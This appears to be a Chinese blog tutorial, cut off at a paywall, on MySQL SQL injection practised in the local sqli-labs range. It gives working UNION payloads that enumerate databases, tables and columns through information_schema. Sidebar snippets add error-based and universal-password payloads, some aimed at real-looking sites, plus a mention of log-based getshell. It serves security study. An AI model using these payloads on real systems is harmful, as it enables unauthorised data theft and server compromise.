【小迪安全day13】WEB漏洞——SQL注入之MYSQL注入

最新推荐文章于 2024-06-18 10:53:33 发布
最新推荐文章于 2024-06-18 10:53:33 发布
阅读量1.3k 收藏 3
点赞数 1
分类专栏: 网安学习 文章标签: 安全 sql mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RichUee/article/details/128190404
版权

MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。
在这里插入图片描述

使用sqlilabs靶场测试

可以看到这个用户名时是root,是最高权限,除root之外都是普通用户
在这里插入图片描述

1、高权限注入及低权限注入

(1)跨库查询及应用思路

原理:一个网站的注入点影响到另一个网站的数据,需要root型注入点

查看数据库:show databases;
在这里插入图片描述
通过’ select * from mysql.sql; '语句,查询数据库中所有数据库用户;普通用户的权限低,只有root用户可以注入到其他数据库
在这里插入图片描述
内置数据库 information_schema 表特性:
记录schemata库名,tables表名,columns列名
在这里插入图片描述
查询schemata
在这里插入图片描述

实现跨库注入,首先需要获得跨库的数据库的名字

  • 通过SQL语句注入,获得所有数据库名字

http://127.0.0.1/sqlilabs/Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata
注意:group_concat()可以获取所有的

在这里插入图片描述

  • 获取指定dvwa数据库名下的表名信息

union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘dvwa’
在这里插入图片描述

  • 获取指定dvwa数据库名下的表名users下的列名信息

union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘users’
在这里插入图片描述

如果直接这样写,很可能把其他数据库里面的users给查询出来,需要再做一些其他添加

如下:
union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘users’ and table_schema=‘dvwa’

在这里插入图片描述

跨库选择表:需

最低0.47元/天 解锁文章
RichUee
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入getshell常用大法总结
weixin_54603520的博客
05-20 601
SQL注入web安全领域最为常见和危险的漏洞之一。成功利用SQL注入漏洞,攻击者可以通过非法构造的SQL语句,干预数据库服务器执行的SQL查询逻辑,获取敏感数据或执行 SQL命令。较高级别的SQL注入,还可以直接在数据库服务器上执行操作系统命令,获取服务器权限,这就是所谓的SQL注入getshell。SQL注入getshell需要攻击者对SQL语言和数据库管理系统有较高的理解和熟练掌握。但只要一个网站的SQL语句构建存在缺陷,就可能被有心人利用此漏洞实现命令执行甚至权限获取。
[0day]通达 OA v11.7 后台 SQL 注入到 RCE1
08-03
通达 OA v11.7 版本存在后台 SQL 注入漏洞,攻击者可以通过构造特殊的 SQL 语句,绕过安全机制,获取数据库权限,并最终获得远程代码执行(RCE)权限。 知识点一:SQL 注入漏洞 SQL 注入漏洞是指攻击者通过构造...
13 WEB漏洞SQL注入MYSQL注入
qq_52718293的博客
04-29 2093
SQL 是一门 ANSI 的标准计算机语言,用来访问和操作数据库系统-。SQL 语句用于取回和更新数据库中的数据。SQL 可与数据库程序协同工作,比如 MS Access、DB2、Informix、MS SQL Server、Oracle、Sybase 以及其他数据库系统。本来有一些基础知识有在sql注入小总里写,现在还是再提一下: information_schema.tables:记录所有表名信息的表 information_schema.columns:记录所有列名信息的表 table_name:表名
Web安全基础学习:SQL注入漏洞Mysql注入
最新发布
qq_51862722的博客
06-18 928
SQL注入SQL Injection)是一种常见的Web安全漏洞,形成的主要原因是web应用程序在接收相关数据参数时未做好过滤,将其直接带入到数据库中查询,导致攻击者可以拼接执行构造的SQL语句。
mysql暴库_MySQL暴错注入方法整理
weixin_31318441的博客
01-19 174
1、通过floor暴错/*数据库版本*/http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(...
漏洞-MySQL注入
山下南徒的博客
07-10 486
确定使用了MySQL PHP程序一般搭配MySQL http://dynamicfountain.com/page-products-en.php?id=29%27%20and%201=1--+True http://dynamicfountain.com/page-products-en.php?id=29%27%20and%201=1--False 由注释符判定数据库为MySQL。 引发报错信息 page.php?id=' String concatenation(字符串连接) http://dy
SQL注入-Mysql权限读写注入
xiaoheizi的博客
06-28 316
1.读写文件时需要知道文件路径,而有的网站会泄露phpinfo.php文件,在phpinfo.php文件中就可以收集路径信息,如:$_SERVER['SCRIPT_FILENAME']就是当前执行脚本的路径。绕过:注入中需要支持SQL执行环境,没有就需要借助phpmyadmin或能够直接连上对方数据库进行绕过。-1 union select null,'null',null,null 正常。-1 union select null,null,'null',null 正常。执行命令,让日志记录后门代码。
小程序开发Day4——移动方向之上下左右滑动
01-07
贪吃蛇的移动方向——上下左右滑动 坐标系: 我们想要移动小蛇,触摸屏幕定位,都是基于坐标来完成。微信小程序里的坐标系和我们平常所接触学习的坐标系,略有不同。 A(小程序坐标系):以整个块元素的左上角为中心,...
树懒_day13_jdbc_sql注入笔记
08-06
移动开发小白树懒,在学习jdbc.对于代码的优化和API的使用做了一些详细的理解..
第13篇:WEB漏洞~SQL注入~MySql注入
廖一语山的博客
09-28 292
目录前言 前言   MySql注入中首先要明确当前注入权限,高权限注入时有更多的攻击手法,有的能直接进行getshell(可以通过某种漏洞达到留下后门的操作)操作。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼百战不殆。不论作为攻击还是防御都需要了解其中的守法和原理,这样才是一个合格的安全工作者。 数据库A – 网站A–数据库用户A 表名 列名 数据 数据库B – 网站B–数据库用户B …… 数据库C – 网站C–数据库用户C …… SQL INSERT
权限提升之Mysql提权-漏洞银行大咖面对面17
07-31
权限提升之Mysql提权-漏洞银行大咖面对面17-指剑碎星河大咖
【JAVA-WEB常见漏洞-SQL注入漏洞
Websec
11-23 1836
SQL注入漏洞 SQL注入是网络攻击中最为常见的攻击方式,通过向服务器端发送恶意的SQL语句或SQL语句片段注入到服务器端的数据库查询逻辑中,改变原有的查询逻辑,从而实现类恶意读取服务器数据库数据,攻击者甚至可以利用数据库内部函数或缺陷提升权限,从而获取服务器权限。 用户后台系统登陆注入 1.1 登陆位置注入测试 后台登陆系统注入在前些年是非常常见的,我们通常会使用' or '1'='1之类的注入语句来构建一个查询结果永为真的SQL,俗称:万能密码。 示例 - 用户登陆注入代码: <%@
mysql注入在可报错时爆出数据库名与字段名
qq_61955196的博客
04-21 449
mysql中报错爆出数据库名、表名
小迪安全系列笔记---13MYSQL注入入门
weixin_51143604的博客
06-22 577
小迪安全系列笔记13
mysql攻防之写入漏洞
weixin_30497527的博客
07-26 176
因为被别人利用mysql攻击,所以想在这里帮助大家提高一下自身mysql安全。避免成为别人的肉鸡。 show global variables like '%secure%'; 如果是这样则黑客可以利用MySQL在系统注入文件。 在linux下这个是不给设置为null的,否则数据库启动不了。 我在这里直接设置成/dev/null 这样即使黑客要注入文件耶没有用。 编辑my.c...
Nmap爆破MySQL弱口令漏洞:解决报错Accounts: No valid accounts found
mooyuan的博客
11-23 3696
nmap工具不仅仅能扫描,也可以暴力破解mysql,ftp,telnet等服务。看到这里不要怀疑,在kali系统中查一下到底支持哪些暴力破解功能,命令如下查询结果为如上查询结果包括mysql、ftp、telnet等多个服务的暴力破解。接下来就以MySQL为例讲一下如何就是用nmap进行暴力破解获取MySQL的弱口令漏洞,以及如何解决windows下小皮工具搭建的MySQL服务无法渗透成功的问题。
Mysql漏洞处理之升级版本到5.7.42/5.7.43过程指导手册
热门推荐
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
06-20 1万+
某次安全漏扫,发现MySQL大量漏洞,基于Mysql之用于内网,且版本确实有点旧,考虑升级,综合漏洞分析,只能升级到最新版5.7.42和8.0.33,现场环境:Mysql 5.7.28、5.7.20和mysql:8.0.21。附录:[mysql5.7和mysql8.0区别(https://www.cnblogs.com/harda/p/16497988.html)、1)可以获取到MySQL/MariaDB/Percona/TiDB Server版本信息,版本泄露,隐藏版本即可。
sql注入mysql权限问题
不想当脚本小子的脚本小子
02-13 411
有道云笔记链接:http://note.youdao.com/noteshare?id=0e4d59cda87bd2e8d2a864b1aa0e3210&sub=A8D1F4C0629B4A5ABAF405920ADD10E4
centos7 mysql升级漏洞5.7.30
Aplumage的专栏
08-16 1630
公司安全扫描,发现mysql存在漏洞,高危漏洞编号为(CVE-2019-5482)、(CVE-2019-3822)、(CVE-2020-2804) 目前mysql版本为mysql-5.7.26,而以上漏洞存在与5.7.29,所以要升级mysql版本到5.7.30;以下为升级文档供大家参考; 转载请注明出处:https://editor.csdn.net/md?not_checkout=1&articleId=110822451 1.下载要升级的rpm包 下载地址https://download.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值